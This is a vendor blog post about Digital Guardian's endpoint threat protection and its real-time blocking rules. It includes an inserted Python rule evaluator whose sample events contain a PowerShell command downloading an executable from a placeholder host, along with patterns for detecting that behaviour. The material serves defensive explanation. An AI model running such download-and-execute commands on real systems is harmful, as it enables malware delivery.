DATAINSIDER

Digital Guardian's Blog

Inside Digital Guardian's Advanced Threat Protection: Part Three

In today's blog, the last in a three-part series, we break down what differentiates Digital Guardian's Advanced Threat Protection capabilities from other endpoint detection and response products. Read the first part in this series here and the second part here.

Advanced Threat Protection:

What differentiates ATP from other EDR-type products is its ability not only to detect, but actually to block activity in real time. If your signatures and detections are all server-side and generated after logs have been sent up, that is not real time. Adding real-time prevention is the ultimate goal if you want to thwart an attack while it is still under way. Digital Guardian's ATP product has this capability via its rules engine, which can also block based on any component of the metadata observed in the logs. If you want to block a binary that has a specific Signature Issuer because it has recently been reported that the signing company has been compromised, no problem! If you want to block binaries that have no Company Name and no Product Version and are executed from a temporary directory, no problem! Our rules engine can do all of the above and then some, which puts the power in your hands rather than limiting you to what your security vendor tells you to block.

ATP is by no means a full anti-virus replacement. Although it does a great job of detecting malware, it is designed to be much more than that, covering the gaps that traditional AV commonly misses. A great example of what AV misses is the misuse of built-in Windows commands for nefarious purposes. If an email attachment contains a malicious piece of JavaScript that simply calls PowerShell to download and execute a binary from the internet, ATP can detect that entire attack cycle. It can also be continuously extended as new threat intelligence is acquired or new tactics, techniques, and procedures are observed in the wild.
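To make the rule-based blocking from the previous two paragraphs concrete, here is a small Python rule evaluator, added as an illustration and not Digital Guardian's code or rule syntax. It expresses the three scenarios the post names (a blocked Signature Issuer, an unbranded binary run from a temp directory, and a script host launching PowerShell with a URL) as rules over process-execution events; the event fields, the placeholder issuer name, and the sample events are all constructed assumptions.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcessEvent:
    # One process-execution event as a host sensor might log it (fields assumed)
    image: str                  # full path of the executed binary
    parent_image: str           # full path of the parent process
    command_line: str
    company_name: str = ""      # PE version-info fields; empty when absent
    product_version: str = ""
    signature_issuer: str = ""  # issuer of the code-signing certificate, if signed

# Placeholder issuer standing in for a signer that has been reported compromised.
BLOCKED_ISSUERS = {"Example Compromised Signer CA"}
TEMP_DIR_RE = re.compile(r"\\(temp|tmp)\\", re.IGNORECASE)
URL_RE = re.compile(r"https?://", re.IGNORECASE)

def basename(path):
    return path.lower().rsplit("\\", 1)[-1]

def rule_blocked_issuer(ev):
    # "block a binary that has a specific Signature Issuer"
    return ev.signature_issuer in BLOCKED_ISSUERS

def rule_anonymous_temp_binary(ev):
    # "no Company Name, no Product Version, executed from a temporary directory"
    return (not ev.company_name and not ev.product_version
            and TEMP_DIR_RE.search(ev.image) is not None)

def rule_script_to_powershell_download(ev):
    # script host (the JavaScript attachment) spawning PowerShell with a URL
    return (basename(ev.parent_image) in {"wscript.exe", "cscript.exe"}
            and basename(ev.image) == "powershell.exe"
            and URL_RE.search(ev.command_line) is not None)

RULES = [("block-compromised-issuer", rule_blocked_issuer),
         ("block-anonymous-temp-binary", rule_anonymous_temp_binary),
         ("block-script-powershell-download", rule_script_to_powershell_download)]

def evaluate(ev):
    """Names of every rule the event matches; an empty list means allow."""
    return [name for name, rule in RULES if rule(ev)]

# Constructed sample events: three that the rules should block, one benign.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Users\alice\Downloads\tool.exe", r"C:\Windows\explorer.exe",
                 "tool.exe", "Some Vendor", "1.0", "Example Compromised Signer CA"),
    ProcessEvent(r"C:\Users\alice\AppData\Local\Temp\update.exe", r"C:\Windows\explorer.exe", "update.exe"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32\wscript.exe",
                 'powershell.exe -c "Invoke-WebRequest http://example.invalid/a.exe"'),
    ProcessEvent(r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe",
                 "notepad.exe", "Microsoft Corporation", "10.0", "Example Vendor CA"),
]
```

A real sensor would evaluate such rules inline before the process is allowed to continue; the point is that every field the rules consult is ordinary metadata already present in the event, not a vendor-supplied signature.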

Ultimately, leveraging both real-time detection and historical detection provides a more encompassing, layered approach to host-based threat detection. Digital Guardian's ATP technology employs both, so that incident responders and security analysts are well equipped to deter, detect, and neutralize cyber-attacks.

Tim Bandos


Tim Bandos

Tim Bandos, CISSP, CISA is Vice President of Cybersecurity at Digital Guardian and an expert in incident response and threat hunting. He has over 15 years of experience in the cybersecurity realm at a Fortune 100 company with a heavy focus on Internal Controls, Incident Response & Threat Intelligence. At this global manufacturer, he built and managed the company’s incident response team. Tim has a wealth of practical knowledge gained from tracking and hunting advanced threats targeted at stealing highly sensitive data.